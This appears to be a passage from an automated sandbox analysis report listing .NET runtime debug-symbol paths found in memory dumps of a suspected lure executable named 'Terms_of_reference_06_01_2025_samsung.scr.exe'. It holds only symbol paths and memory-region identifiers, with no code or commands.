Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188522957.00007FF6A81B8000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.pdbhP source: powershell.exe, 00000004.00000002.2110018131.000001F7016FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160623783.0000029808800000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3158687208.0000025771EE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167883026.000002980C490000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167851335.000002980C481000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165863155.000002980BB21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166308984.000002980BD10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.pdb source: powershell.exe, 00000004.00000002.2110018131.000001F7016FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159195195.0000025773911000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmp
